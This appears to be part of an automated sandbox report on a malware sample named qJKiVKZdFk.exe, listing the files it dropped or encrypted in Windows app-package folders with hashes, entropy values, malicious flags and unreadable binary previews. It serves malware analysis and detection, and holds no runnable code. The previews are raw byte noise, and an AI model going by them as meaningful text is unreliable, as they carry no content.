                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):50863
                                                                                                                                      Entropy (8bit):7.996889814515831
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:1536:X7q+ebE3eMcL/hqd79ElcxSbfJIWiNbU1GK:X7vebEqL/SulcxOJ9ix87
                                                                                                                                      MD5:83C1CE7A0BF5F1F8105C295096908638
                                                                                                                                      SHA1:9F7038F0CFEE427B84F194D79C75F728D4A66680
                                                                                                                                      SHA-256:13DB21EE94A95C480CEFD528E3FAC9B54B82EE434FA9DFB189EF428CC6641BB2
                                                                                                                                      SHA-512:86866C28460A8E3F4CDC639076C37DA2B155664165765912FBF28CD09E4BDA3CB00AA15F8F70248E4716DA5779CB4EC217644EB481AE5E14004C8583D5F36687
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:...../l...=..S..... Y.t]../.!>.U...u.KI....r..m9=|<q.T..6..I.n>h..($.[u...B3.f.>i..M....r.&.0.k.p......w0.e.6.q.e.Pw...dE.n...u^..4H.'.w&N2..1C.g..n.j$.....!..6.....O.@...w..Za=.....3......gn.r .Zx.Q....W.~l]..=.........g<_o.c.F.}.....(....X.],.S.A\..PW.$.....Ke.....;.p.......`.....3..j..Q.m..J.o..-D^...`)..1q....*@.S.|.P.2.5F..KK..(pd|...$(I....1...E...JvJL..RR..Q..q|.+........+.:....y..hBa.ct.V....o..%..|... U;..j..&..H..O/...=`G}(...!%..x..K]...ZU.J0...<....}..'..(.......)Y.R....{...c..Y...V.2..z.....Em..)...Z.4y.....(............'..JVO......KG.L..`.......{k\.av.%.$...T.{.r.?.....u|e..~.?..O_;.....J..f.y..g.sF@._..h....1.O.7.A..W.....B.^nh.N_....F..csX.n.$.*..9....N..3...<m.o......w..A...A........,............#..M....r..].l.mt...C..R!.)Qf..|..6..m...G.e....b.B...9.I..t...].............1pl..f.y."S2..l.....]V..5...Z..M.L.5.f.V(r2!&...U9.....q/{.,...&..\X.#.|.z.k!k=LpR.v..kt......Vm..V......>_@.._..c...g*......<Z.xf^.....PM.b.....#t.

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{05ea5f90-4347-4a95-a7e3-40799835a752}\Apps.index

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1127261
                                                                                                                                      Entropy (8bit):6.543145744305221
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24576:lz/7tXEFpxR5YfoyFxz8GfoLr7YfoyFxz8G1LNO:lzapxQf1xz8GfMwf1xz8GC
                                                                                                                                      MD5:A2F00CC521B4322AAD0CCF65B869468A
                                                                                                                                      SHA1:63553428942B0A093A60DEC902B591B3D2D6F8B0
                                                                                                                                      SHA-256:C8AE7F237933F870AD6606329B097E73868FD2C14772AE1A9911D8F599C5E59D
                                                                                                                                      SHA-512:DDAF2B4FBF526617E3513145F723AF36B5F4FE644E3EA9836E384979D2532FFAF962854F9494DC252C17A12A9AE63E261C572D6A72F9CD59B3269856D09E00EF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:Ej..D..A.r..?.Aq.j....F.t..u.5......me.m..T0.Hy..8>.n.H..7.Tk...8m=.I.6....D...bI.... ...O'../..u..........L..,.^.48p.....^.{-s.t..{......o.k..HY..D..... ..!.g..;.V.........<...z......L......3.^..0...|2.EW........,]..+..8...&...p..6rR'.P.i?g..8.HI2..zm....P..q.}y.vp.Y/,......H..1........Lb*...1`. Ex.p.x.......V.D).?...Y.W.MX%....C......f...<6..0....*.l!KgB.AoB..s....M..^0P.vt#~.T....y.b.......#MA....r.-Im..}..T...)v....[F...|*Z.:.VR.....T.|C.....4hrn....P.py.)1`....O..q.9...fE.sd.J\.".....*....(6.......(..J(.....o.nG"... o....@.#wg..T.8........./0.{.....Q.y._........a..=......[.4EP-..s.$...lM...y....wGe...[.!_..nz.K..1..Z..9._..]o.>Pyw.....payI...)Y..3.f^.0.5%..6bE?...\A........I`s1@UQMV.....+..I.{.)...N%..}..w...[..@W..\`...............O~.B....:.^!l.n./..:..5.0....r^C>&Ynp.....m...1..r...;r...~s{T7q.\.<%.BL./&.6...2....l-j?...8Y..dV.....;.{",....p.S'R.xr..68}.).S........xK.'..d;.o.c.T...R.....rm....h=K...0.h-.x..G}^.DY.....buo........Ne.....

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{3bc3f5b6-b1ab-46e4-a933-7d8002b0a491}\0.0.filtertrie.intermediate.txt

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):37812
                                                                                                                                      Entropy (8bit):7.994308517730613
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:MehzW2tHhEt2DbYzNCDMPnwnPTPFuf+LyVgXM/YgtGZos/:MehrKE4zUYPnywVg8/zIZ//
                                                                                                                                      MD5:A77B8227CFAA8B8BC7CC8C3551811D92
                                                                                                                                      SHA1:6394877969ED329485DC8E91B103223F2D133523
                                                                                                                                      SHA-256:8E3B792AFDC868D8865F1E4B86613244B7C23EAF34391860C5797C922FB97E57
                                                                                                                                      SHA-512:FACF74A14D448AB55B33E76FE8F7249F6E679DDA314C30C099A2C8713D24761E74236722043BFE07E31A0CB2712CE10C73B8FBB0A6E453967B79178BFCB812A2
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:0.0..-.a.W.6...k..V.L!....#+>\.bm.......Hq.,".*..oxg..}.;....n...m........._.X/..T01.ZPN.6...X...X<.....6Q.]n.cfL;ul.......XW...O.y....1.!|...q...%%..O.z..k4..b.....gI......:..+j........R..d".B..M.W....1].XypYXi..Y"p....R..#+(.;.))g..p...^w......d.W.....>NE...**..N....(.G....1W..M..MX.....|..........-Cd....#..(...xVO.<.2..Av8.KA.....U...u.IKO..t..OLv. 5@.+..'.6Q.._X.1..lA.V&o...[j..7.6..Q.?.f.?l"V#jS.....r^p..xof.5.se.1KW./.*M...e}..Z.._.,....Bg....ku.....%...e...V.r..dgo..%,Cnr.-4.(.]..<$..1.C....G..m.]Y......r...P.%.>...7ue\.9....Kp`..].%.#..j&U.||..P.+...6.K[.O_.#.o.../b9.Z).....<C..k..fu..9..I..C.)...A..aC`Dkx.m$.....=...Z.!sG.H.....hd.........k[.........<~..F.Op.:.Z{.sMx.l.Yv.{l...b..8j..D........x.z..o..I.}A.J?...%....&."....$......t.A.f ...R.8.0....-.g.'BX..}..J.uZF....D3.:vI... ..b`.%.X...m.....*..O...I...N`G...tP..D.,e.0...3.....:.T..)u..f...^...t...f9C..3v.>.......0..o...y.j...)....Kr..~XG..W.w.q.kR.........K..[V2..pu.l.s.

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{3bc3f5b6-b1ab-46e4-a933-7d8002b0a491}\Apps.ft

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):50863
                                                                                                                                      Entropy (8bit):7.99688194580724
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:1536:rj600negKqEjzEPlUZ2vQLZpejPavNO8bLnd+aQM:rj60GegKqEn7FLZmPav8wLd+e
                                                                                                                                      MD5:6353F9387FC9B0A66803723D97786401
                                                                                                                                      SHA1:425CC3A7C8B7DFA0E58CC3D05F0E1870044F4BDA
                                                                                                                                      SHA-256:F65C05B3CB17EA4F6A6D1166968115C2D5802C8CC30DD31264EF4A99AB921BA2
                                                                                                                                      SHA-512:5E50D3602FCAE7F09CBD481355A69464E57A3EC0724C0D098598463E7A2BD97543A58D41E2CAE2B8758C3105811A1813A3188FCCAF4076ED2CC196ACF34DFA09
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:.......(.......oV.c.<..<!.MZM..N.<.....9.....o.@/.|...y/f.....Q...y..#.VZ.D.O.9-......$.....a....B......a_....RzMW*XX@.....F.a.....Z..t3DJ..... .G...f...O...@....;..qzx9.........&.^-.B@f.<.`..B...L.x.-.g`L.X.E..H...@.:..X......K.6.=k_...k.-....m..yNGh..>"}....^..*..-...{[.....%.....1..h.X1=.7Y........).RCY..t..V.l.8..C....Yc...HX...............'.=.......?~..=x........u.H.Yn1.I..2P..E.......qI....m,..HD.&..E.AZ.."]......P..g./.v{...E%n..FL7a\r.....3m...|6.ds.,*D.....]..Y.r.=....X....j.t.q.=..0...........z.....E.._.....4^.o...D..|.z;J.%;j......%.6`|.?gL.."?..@.1:..-.?5....h..%.U.~......t?..-$sRY..D....Y...>7...l;P........p|.....e...D..`.(....C.....y..t..l..F...3g.JU....-........B.5.....{.i~.............r<...-;...5..X\...H.....0:Ew#.....9.HW<...%..q~........t..D...."B..Q.\F..S.D...>.t...a.'C.+k...h}.......K.f.d..EEm....0._a.="p.......B.$.....Y......z....F+.}...9.....o.1(.?....\..|01.q.dL..Zwk...$.wg.-.hg...]|.....d.,...8.H..f..A....

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{3bc3f5b6-b1ab-46e4-a933-7d8002b0a491}\Apps.index

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1127261
                                                                                                                                      Entropy (8bit):6.5431761431638265
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24576:+EafGeWYfoyFxz8GfoLr7YfoyFxz8G1LNu:1E39f1xz8GfMwf1xz8GS
                                                                                                                                      MD5:1354CC6BBE5F05784548BAF03C0C8CDE
                                                                                                                                      SHA1:887188E334966E1CB0A0B4A34FD1C280CB17FA0C
                                                                                                                                      SHA-256:10F308D415388E5F2D68C36CD14269CE85A839FB420F794844C27A559D8B89E3
                                                                                                                                      SHA-512:810848D5EFA1C250E8EFD7674AF47BE3DDF15507240B8C042FE562CD511071557DBC06D446BACF977EA8D60F272025523EF7F26CEFF66979DE8079C9E8458302
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:Ej..D...}|.:m.F.H..Z..@\..5X..,c.4.*..G.j....f...Pe...k..@4.]f.,.CLh.,...\....Hu..<.|.........~!d.v)...)...Y0..8...w...[W.........w.....R.8.#.....r&..s.q`.Mq:;....+.....4!.r.I...2..V.M..@....P..L...6..8.....O...l2..S.OI...k....>...dJ.V.V.).c..5`Q...T....B..N.V..I.R.K....y.4._..Hx..U.........5...'...~.g......\./...e............|F...O.;..........~.....$.%.7g?.\$..T.}..2.C....g.i.J..x.....i...c..JO..............U........9..........7..E..R@d..N.8.................e..uc.;5`.........s.P...-.p."......,aG.~........w..EU(..(c^..<.6.L-.v...].L.._..:5...gu~8#..}.M.....=.(.A"V.g0..!.........,GA..z.{...!7..o.Y....4.1.Z.BbTNzA.q..G.O]Vn.k.j.2Z....&..vRs.-...?....*/.'.Y(...#]gs.7.l.(.y}..af.F.p......;...Zxd....+.c..].w.=..~*..Q....S....($=-..z.M....S%L......=.....3..*_....9.k.&T.........Q..YX....._U.C<.j...iD.J.....=..;.e.Ygf..It..a3.M..UY.........;3.$..u..k,..Y.d.8....@.^T.....vP.F.\.$V.....V.}U.m..'..Rd.j...G/;k.3.<z..f.R.(..4<.i.s..I.BRY|^F..

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{9a386491-5394-47a0-a408-e4e3a9d60139}\0.0.filtertrie.intermediate.txt

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):37812
                                                                                                                                      Entropy (8bit):7.995773437669959
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:GZmjABqQiYQqOP91kRdnkSh1t11AYND2anlSmRQ6dCmlXSMLmBmH+:GZcAp6P96dVqZ6YUSmxH+
                                                                                                                                      MD5:2564D389E460A79B4D51038B1E951F19
                                                                                                                                      SHA1:63075FD9513BCFA5A4CD5380E767C932B161D4BD
                                                                                                                                      SHA-256:C3720A7C89DA990475182723C971BDA1A06B21E797C4651F11F760010D051ABF
                                                                                                                                      SHA-512:BDD63CF5707174CEDFAA47344C5A99C9229AE3ABE43EC58ABC555A4CB10B05D451B131A04286BAE978B7722F1FFFB1AD2CA45FDFF18A664F6924094CA69DA0D3
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:0.0...0....9..@...1M..|`X.g.;p@.X.f..XE.-.}....9.........rr.#....\.I..\+h..g.G....5S..f-......u..@..k...h[.g2...?.....b?...2..>...l.M....Y./.....!.^..1...gE....O.6.....^....._^......c.....%.+..[..R.n..{..N..-Q..... ...Y....<..1H.....?d#..g...a.. .Yl:D~NwK..uF`....`}..}[`....e.2..#5 b.;.:..rp...@o^c_........<.K.i..z..wG..mM...zm..C...<-xn>...H.4..e.......\&&.....:o.$"m.K../.N...'vPzKK..8...*.Y..[.3y0v."..M.HL3.Tx.t...c.....f.b.n`xQ....oK".%.o.......-z .....37Q$...'[|i.;.+.....(`k.&.J.H....c.lZ....CY..f.<~..p...XAv...{..&6G..r.-.?..ar)v*..J.='~.......}.*.....,5../Z....9D.u..m0..|..Tn........&.C;...R...P...3.B..K..<.}v.^..On......E.WU.....o..1.?..e.&..JQ..7fi.B..}.0..Q.h...k..(.1]..V....a.MOFzQ.[.$..n....(z...q..@ ....?R;.,.....2~.... .)N.'.......3.....9..............c.....G..P!..[..:[..1.^D.|...X..U...=...|..t!.^e."37.............Q....n.t.w.....0}<.6........j.Pw.1.K........G..L...*...?..z-.<.(.^....i..j.....b.\..-......8..W.=%..I'.

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{9a386491-5394-47a0-a408-e4e3a9d60139}\Apps.ft

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):50863
                                                                                                                                      Entropy (8bit):7.997129276756378
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:Dl7vnVi1dypmnVCkkoqW27Dw6BDEkEZnZowRin3w6fulaDTLQ6hNbDsqvH4Q6WK/:DVVij7koqjJajYg62laDTLhstQJkJXa8
                                                                                                                                      MD5:0D45D0ED7C8BA3320796E3AB096A54AA
                                                                                                                                      SHA1:FA1ED5B71A4726732439DB84BB22EEDFF2CFA27F
                                                                                                                                      SHA-256:C1A1E1B8C7D5A2376BC2375C1132A8B7D73BB8CA1E68FD9C41C9DB179C54A305
                                                                                                                                      SHA-512:AE6A7D16D1CC686E34453FCE59B1FEB5BE9C0E57983221377B5F6A06AA5E0C0E79ED7A76E8D5E0D027D60E840789897CDF97AA8D392C3C713600B3A38B7E705F
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:...... M....G...X5....:.....(.&e.Q..... .....-0....d.l.........*.j[[r.../....I.f...[6^P4.tF..<...l!C........b}.y.\....D....r..A&.'....&..6.}@..../.w.v...p./c.`.k...U.3{..9A$.p......}.[na.;.n"..C0..i.Yy ..[.Sq...q.......%{.c....g.9..27_..8.EmmG...p..$6.....Ax{..*.tb=....t(..M...5...+.F-..\..&Wu7.._.W..gY.).....g..[..r.{...$..P.1.r.U...B.e..fc.....)X.. Q!.*]}..)...\*....ymf.+..).+..^ ..S..G..1%.Fz....4t...a.vG....2(...;.;..v...Q.q..w......6%..+...e.g.b...#..gf\.X.........[......c.'....~......QQ..lB.o......alU.o..K.H...Fq.[....;#:.[..B|..I?.d....'......{...48k.v.v.h.@....(.....s.......]b.l.(.< ".lQZ._'.r.5...a..$r...x.+..D.*.7...K..2.eJ.<..L.l.3i.Y&..........uv...n..E......Fz........o..... .....C8.R/....E.m0..".(&$T(........7.B...6...rG.Z..}..."....S.3.LR.........#.....}..^G...Z..{Ft-.{..I......$6J.".g..j(w=;....h.1l..)..S....j..'1. . ...j.R."..:....`...R.j3......{V.'.9..(..^.{.s7.X n<..T.c.U.P...%V.t..q....r.w_...vUG..$....O...3., ..r.W.::a..D=<..

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{9a386491-5394-47a0-a408-e4e3a9d60139}\Apps.index

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1127246
                                                                                                                                      Entropy (8bit):6.541856517986823
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24576:NUbleLngYfoyFxz8GfoLr7YfoyFxz8GeTN7X:NUGnjf1xz8GfMwf1xz8G+X
                                                                                                                                      MD5:D6CDBA36060B35AB83FC4AB537D195EF
                                                                                                                                      SHA1:A572C598FB826F768D58CDC45650DA5AF73DC686
                                                                                                                                      SHA-256:2A9B67C4832A7AEAD4174F71AF41CFC86FFFEC3AFEC3FD146B6DE06640CD06DA
                                                                                                                                      SHA-512:D98EC515866A10825C89A83620C69782797D7EB3A650664C7396B00E3A00FF9B452CC6A1D07D727FDD8252FFB701F96FE3BA8019D11403D6CC8C8630AB72CA13
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:Ej..D.......t...A..K.....(..?...4g.|D\...r..1e....1.7.j..>(.e. ....S.C.l.eM....&..g.G2....I....#T....Z.R"e.3.A...g..#U.e...,9.u........m.....Ut.S=........K...$.^.o..\=.kO.w...3/.d.E.... .z..?"..Y.=..t..O.7>w.A....<..:..7..'.Y$.zE...@'...+$.3.%...AK.O....,.{&`.....<Y.Eo"'m._..8z..<n>.6. .7...N..o.6V.+..........m.\.H..eG..+FM....[.J]i.[.}..3.S.....Y2.......v....w...~\...e.lZ.......E..}..J...{...q.....s...K. ..4.-5.B..w.......ri.?...t..7:..R..+.jn\.D.Cm...7..w>.1.xc.&..T.B<.A6mLQWf..Q.V..se.C....Q.>.!t....!i;.9.s.3 .B:.5|?$.L^.]..NR0.jYS..{...y~u..i...V4E.#..V...Y.;.....X.k.y.J....Q.-.....Wp.u` =..4...@j..'RH.X-._.*!6k........Lyh.......vy..Z.fM?..R.M..&q... ..D..e.<g%u..\S..O..l.L'o..=..c.p..+...@..57l..K..#.r.Z..Y.V...7..8.0.@.T}!.#.~..'|UO....R.{.5....A'q.h..j|.$..68.d.pAzU...!6.....p.Tr$4.....^.._.Y+...^.zQ...8B&dLVh.{m.L............h....$sn.fv). .mp.dy..?te1EA&.p..z.W.<....J.........Y..3.....E..M.`.C.....e$ ....:.X9Ur&C4..7.}7Q.5...U.".Z.i.3....

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):39476
                                                                                                                                      Entropy (8bit):7.995708372308648
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:DIhOw2d3py9hXwbghF6KGRBGRo4/b6Y/qCZgwCpvGoFXM0dJ5ef0JH70aqFAqTJC:DQe7yfgUT6Q6Y/qjwYdJB0aqFAqTobb
                                                                                                                                      MD5:4DD5A2D019CC4FAA236DED66EEB2D57D
                                                                                                                                      SHA1:C2E9DBE189360FADD91F109A8C62ECB53315BD1F
                                                                                                                                      SHA-256:B72E8391C9065ADB3BAF5FBF869E501676B534D4EA955C4F1D0467CB06F64B0F
                                                                                                                                      SHA-512:516D76B3BBBFB3AC4D191551EA48ED1C0DA802D2C659BED27F8E6807656709DF31863273492B416B344C448B780614A9003128E95C40C76B60C336B50D5E284D
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:..].N&h....G...Q"w..N...{....&d..?...T....,..I.5.....R...}.kqB._.]?....m.p...*<...[s..-.1.?.Za-.Nnh.PS...H...V.P............O...zI8A....;.8...J.r.RE.....O...?/U...j....D:...RN..q...1..%...M....p])..-...E..0+.*....vo.w'.*.........."...u..."..s.w.....-.<..9....P..Ys2..&.....:..t6+.z..o.-M.........c.X..&.Gh.hEh_.-...tN..Bvy.K.l%..!(. ./.....n.5y.^........hB....5_.......t.....1.^.2*..K...M....LD}Y.B....y..|.3...i3Q.X\.Q..(...4.%...l.@6.UPF.........[..j.........n..CQW....m5."..5.9.i;......*....I....SQQ<G.*.......4u5.2kHC9..@t.y}v..5......k......~.5...".0....S.t=.%Wf.q.(8....eU:.. :?^..L....[.y....C...G.J..S.".G.".V.....J...y..Z.4.}.,..W0.Ek......K.c...h.k.l..F.k..3.0.r..(...4H..)..<..>./...-....Q.....).....)."...h{l.d..\..XL^.bW.....9..o..=..sS...Q...%.......-4A.O.";..e..i.......K..z.)...X.fH.....p.y7.]...L..I...I>1..Z<.%.;...4.....>@`o.!..h/p.S;[.%..V..z..D;.r...4..|.FzG........:...1iG[.J)....hz.y\..?.-..`.]\(%.@..4R.....%>.....G...A........`..

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.977474273796637
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:WE/jPd4nmy5KBt2lnXldg2ds+GTm6l4kezOpxQBOvrtfmWsXqcGobFILUFmSixLh:TJRBtoXXqvTGTAG0vNm/6crFhL3lZS
                                                                                                                                      MD5:7F28FCFAD998B0BDFBACB88FE844A768
                                                                                                                                      SHA1:E44BDCBC8B3C8DB181FF2C55CDDC4CC3E1AF0FDF
                                                                                                                                      SHA-256:30130A05AD13CC3C87C497B83092F050473A2C744EBB763BF04F35B20915A8C5
                                                                                                                                      SHA-512:1CAC2EA75CFFE5792FA5FBF3EC5A55FAA1250B9E1398672B9AA3584EB58D54EF8FD93FA5BB64F570DAB28EF099339B525F304CA79BA8B05BCD4BE215C386BA53
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.. ...+...|.[ .z....*.v.R..N.....jO.Y.=+.H+..1....}..w........'.LS.....1.Phe.v#N.......Y."W.U..)#`..?...._...l..,..S...p."..1....'.p.|...T.......K.M.v{f.....iA#..+.{......DSn.``}.zdd...O.A......". ..P.5.bEm..[.D....p.pA...M...N..#..mM....LJ'.QJ...O......G..Y .._^r"..Z.}..1Sz....J.D.....K. ..:.....0.5..q......<.(..fUR...Z..u..V.$. ...KV35..s.U..-.$.~..g..+.?..eHe...k{......On.....x.}m..{......J].C|.Gw..r.k.%.''.9TZ..wk._..v=@..8.*.*.#.w..../l?...wj..FB.A.Ye.u.{........<..T.c..*q...!.1......P*.G..P.GdFq.dW....s....aSr.j'.k.j....Wi.].L.>@P..L.T...`Oe.v&P."...<..>..d........@.vH......v.e}|.$....0......2..m^xm.....z.<-MP....(..(...7.2R...H.........\.{.>.2...{...]..6..5....../.,..'t..\(,.E..m...t...U..n..1..c.......c.x..|~....v.*...FC...$./.F$.`X].n...RU.,..a2........k(4.u.....0q......aju0.mP)C.d#..."{P.._*..qC...#.x,..h.....&?.k..FK.N."..,....+l.EA.kMln..".S...1..z.J_...$.n2..i.4g.......B..8..[..*.U5m.........+..IxbY...DC!..

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.9745878563196255
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:V8qsavLbkwSviH4dOgbX1lcyX+e//6ivnp:6kDA+goyOu6e
                                                                                                                                      MD5:F90916FB0A3E29D811039C844BA60C87
                                                                                                                                      SHA1:A7532A91A56CFEAB587E9851C868DCC0A054DEE4
                                                                                                                                      SHA-256:6B8646869B4EAE71F41E798DE46281D0296B263A2B08CC4376FE22D55A884361
                                                                                                                                      SHA-512:405F268D8C72ED35C02C249D4404132CEEF544C2CFF11F80FD657E84566D83CBCE8D32D12D078D7A18F665105D0DC09CED7D31EF919B72D0A2F060BCEDAC545C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.2...GKKR*He...`...4...TS.m{.`.).5...&J.P?..1ckdCJc.S~-..=..T.....?l3.6............:...{.R8..WA.q...d...H....#...X.>k..G.|.Gj..<%k....M.}.[ .Q..s........N.o..DidPj$W.....}m.j.v.I|......35..*.....A.(I.....Pi>.%HZ.>6..i.AC;....kTV......"...}]......P...y..6....R..x5F.1...K..R.{ZN{.Z..T.t..IN._..[...A......E'..."...&$5T(.p...KZ.z..........`bV.y...E^x.h...M'.Y.f.T._...?pRS/.j.n........X.)..d..T..f...g...p`.u./.oJ..2F.....(m.8s.Xx1..>f....U.>.K.z....l..~....;.8X.t.FN..2*K.a..H.o.Y>..Ey|W.c.h......zt.6.......z9kC...P6.9..Z&.[8G..+..$>...FWO;.}.0U.z..v..\..H.V..N..<{=...=.>.R.....L...m}F.E2...v..8.c,.-."..6......`vZ.q.R.X))X..#0/..S:...Z.....4...........-...%.>.SV2.a.\..j.`.5:....@'L.Q..831.1..0..T..em.D"{8...Q.U=.q...~..U.q...)...3x..6n...x<C..h.^..C..\.....Rp...+.x.X+....M....!6.v......o0..X..u>.....!s.!......m....8.W/)2........\D{?...}}.....Sg..?.A{..........G...j.1..C..M...r.|..u.i...Zq.m...?..H...o..Gn...'..I.VFP.....y'_..8.Rq...ur.

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):16718
                                                                                                                                      Entropy (8bit):7.988476323289624
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:ayzFEsukixS4Ri+4UNu0j55bizVXE1Jl+ukjpxO9RooL2:pzC5A48+NtdizV0vlKxmR7y
                                                                                                                                      MD5:78C3A4A7127B503249326B83AA6FCE76
                                                                                                                                      SHA1:DF2E33C7B28AFB6AACC52CA886C1FE1D891E32F0
                                                                                                                                      SHA-256:1CDA88AB76AEE80E7FC949F79A7C16FCF309CE1FE8A18C81F19F389A63E48780
                                                                                                                                      SHA-512:391FD9F6C918B0FC171911C47060614B70ECF7B51277A47CE4324B27AD79B3D6985AFD5D779EA3401709ED49149AE448DB1975CAD099E614D2C095BDF8020A4C
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:regf.Lj..%..'...!.b"1.r..l3...i.s...Rv:.7.0g'W....Z?......r..**.$,.....<.xv.9.|0$....t.....K."..{..$.a..0...<^..C....B.......|.].......YlVw....;=..H...m!.z..@.#g..x.D..#N...".j.!F...=.....-.G4..P..":<H.H....(R.H.5Kq.%......b/...5=.*( _7.z..}........@4 .....m....N.tq....;4.`.\z....M..^.3.S.'/.....R.^|..wy...'u.....z .......a...C..1.6N.rw...d.....k..NF-z1.\....,.~(C..Z/..y..../Z.9..E/_...~..Lk.2.0H...1%...;....O........k..[,J.!z..:.Rm/B..(....!..i.....^....J.\.k.....|>.~.....7.@.B...(?.Vk.).#...Q%.A...HE......D.|..n.\/.A8V7.M....M.f....Gi..J..{.Gv....!.....V...'./E.6y.h.dy~..".f.-.R..}.....E....S+.*.....9..-'.yG%.b!.,6xg.n.G2..L.R`.>.N[.....O;..b.u..6.[....p...LeI}.A......".3...1.Z.@]..f..O~...*.NK.....?F.z.......v..........4o...u..j..0..<q.q.c.9......5.P%.(%W. L.`...jV..^.Vg.[....../I..k........uw.W.;..4..., ,..9!].J.GN.[p..%<.I.9...tnh.z..a..'9iI.R...!.h.............WO.#..a{..eT...Y.W.h..0W.....F.N.....h.W.,.u.j$..g.Ti.(...f...7

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.979073836750528
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:3ZVf6EMO9gEN5NtRU4fLPUsluCS7cCaX07R7TH/0wMRcndkez:JVrMeNN5nT8s6ZZgTRykO
